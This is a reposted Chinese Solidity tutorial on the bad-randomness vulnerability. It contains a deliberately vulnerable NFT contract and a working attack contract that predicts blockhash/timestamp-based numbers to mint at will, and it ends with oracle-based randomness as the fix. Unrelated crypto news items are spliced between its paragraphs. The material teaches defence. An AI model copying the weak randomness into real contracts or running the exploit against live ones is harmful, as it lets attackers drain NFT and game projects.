WTF Solidity 合约安全: S07. 坏随机数

我最近在重新学solidity,巩固一下细节,也写一个“WTF Solidity极简入门”,供小白们使用(编程大佬可以另找教程),每周更新1-3讲。

这一讲,我们将介绍智能合约的坏随机数(Bad Randomness)漏洞和预防方法,这个漏洞经常在 NFT 和 GameFi 中出现,包括 Meebits,Loots,Wolf Game等。

很多以太坊上的应用都需要用到随机数,例如NFT随机抽取tokenId、抽盲盒、gamefi战斗中随机分胜负等等。但是由于以太坊上所有数据都是公开透明(public)且确定性(deterministic)的,它没有其他编程语言一样给开发者提供生成随机数的方法,例如random()。很多项目方不得不使用链上的伪随机数生成方法,例如 blockhash() 和 keccak256() 方法。

坏随机数漏洞:攻击者可以事先计算这些伪随机数的结果,从而达到他们想要的目的,例如铸造任何他们想要的稀有NFT而非随机抽取。更多的内容可以阅读 WTF Solidity极简教程 第39讲:伪随机数。

Web3开源大学WTF Academy获得Starkware资助,将合作开发ZK和Cairo开源教程:11月5日,据官方消息,Web3开源大学WTF Academy获得以太坊二层扩容方案Starkware的资助,将合作开发ZK和Cairo的中英文开源教程,为以太坊和Layer2培养更多开发者。据介绍,WTF Academy是一个Web3开源学院,提供免费开源Web3技术教程,目前WTF Solidity极简教程已经更新50讲。据此前消息,WTF Academy发布习题测试和链上技能认证模块,并已开启公测。[2022/11/5 12:19:54]

下面我们学习一个有坏随机数漏洞的 NFT 合约: BadRandomness.sol。

contract BadRandomness is ERC721 {    uint256 totalSupply;    // 构造函数,初始化NFT合集的名称、代号    constructor() ERC721("", ""){}    // 铸造函数:当输入的 luckyNumber 等于随机数时才能mint    function luckyMint(uint256 luckyNumber) external {        uint256 randomNumber = uint256(keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp))) % 100; // get bad random number        require(randomNumber == luckyNumber, "Better luck next time!");        _mint(msg.sender, totalSupply); // mint        totalSupply++;    }}它有一个主要的铸造函数 luckyMint(),用户调用时输入一个 0-99 的数字,如果和链上生成的伪随机数 randomNumber 相等,即可铸造幸运 NFT。伪随机数使用 blockhash 和 block.timestamp 声称。这个漏洞在于用户可以完美预测生成的随机数并铸造NFT。

goblintown.wtf系列NFT24小时交易额增长超300%:金色财经报道,OpenSea最新数据显示,goblintown.wtf系列NFT过去24小时的交易额为114 ETH,增长率为302%。24小时交易额排名位列OpenSea第12。[2022/10/10 12:50:58]

下面我们写个攻击合约 Attack.sol。

contract Attack {    function attackMint(BadRandomness nftAddr) external {        // 提前计算随机数        uint256 luckyNumber = uint256(            keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp))        ) % 100;        // 利用 luckyNumber 攻击        nftAddr.luckyMint(luckyNumber);    }}攻击函数 attackMint()中的参数为 BadRandomness合约地址。在其中,我们计算了随机数 luckyNumber,然后将它作为参数输入到 luckyMint() 函数完成攻击。由于attackMint()和luckyMint()将在同一个区块中调用,blockhash和block.timestamp是相同的,利用他们生成的随机数也相同。

“哥布林” GoblintTown.wtf NFT系列市值突破1亿美元:金色财经报道,据最新数据显示,“哥布林” GoblintTown.wtf NFT系列市值突破1亿美元,本文撰写时达到1.105亿美元,交易额为6834万美元。此外,该NFT系列地板价已升至7.1 ETH,24小时涨幅达到37.18%。Goblintown NFT 通过免费公售的形式在以太链上发售,发行总数量为 9999 个,其中Goblintown #6485以77.75 ETH成交,约合 150,507.29 美元,为目前该系列最高交易记录。[2022/6/6 4:04:39]

由于 Remix 自带的 Remix VM不支持 blockhash函数,因此你需要将合约部署到以太坊测试链上进行复现。

部署 BadRandomness 合约。

部署 Attack 合约。

将 BadRandomness 合约地址作为参数传入到 Attack 合约的 attackMint() 函数并调用,完成攻击。

Nansen:目前有184个“无聊猿”BAYC 持有者同时持有“哥布林” GoblintTown.wtf:金色财经报道,据 Nansen 官方社交媒体账号披露数据显示,目前有184个“无聊猿”BAYC 持有者同时持有“哥布林” GoblintTown.wtf,占比约为 2.94%。Nansen 指出,“无聊猿”BAYC和“哥布林” GoblintTown.wtf 的一大区别在于,前者是在加密牛市期间为无聊的“行业老炮儿”们创建的,而后者则是在加密熊市期间通过免费公售的形式在以太链上发售。[2022/6/3 4:00:25]

调用 BadRandomness 合约的 balanceOf 查看Attack 合约NFT余额,确认攻击成功。

我们通常使用预言机项目提供的链下随机数来预防这类漏洞,例如 Chainlink VRF。这类随机数从链下生成,然后上传到链上,从而保证随机数不可预测。更多介绍可以阅读 WTF Solidity极简教程 第39讲:伪随机数。

PeckShield:goblintown-claims[.]wtf是钓鱼网站,与官方网站极其相似:5月26日消息,PeckShield发推表示,检测到goblintown-claims[.]wtf是一个钓鱼网站。该网站引诱用户连接钱包以盗取NFT,并且这个钓鱼网站看起来与官方网站几乎完全相同,提醒用户注意资金安全。[2022/5/26 3:42:50]

这一讲我们介绍了坏随机数漏洞,并介绍了一个简单的预防方法:使用预言机项目提供的链下随机数。NFT 和 GameFi 项目方应避免使用链上伪随机数进行抽奖,以防被黑客利用。

推特:@0xAA_Science|@WTFAcademy_

社区:Discord|微信群|官网 wtf.academy

所有代码和教程开源在github: github.com/AmazingAng/WTFSolidity

来源:bress

Bress

个人专栏

阅读更多

金色早8点

比推 Bitpush News

Foresight News

PANews

Delphi Digital

区块链骑士

深潮TechFlow

链捕手

区块律动BlockBeats

DeFi之道

郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。

金宝趣谈

[0:6ms0-6:806ms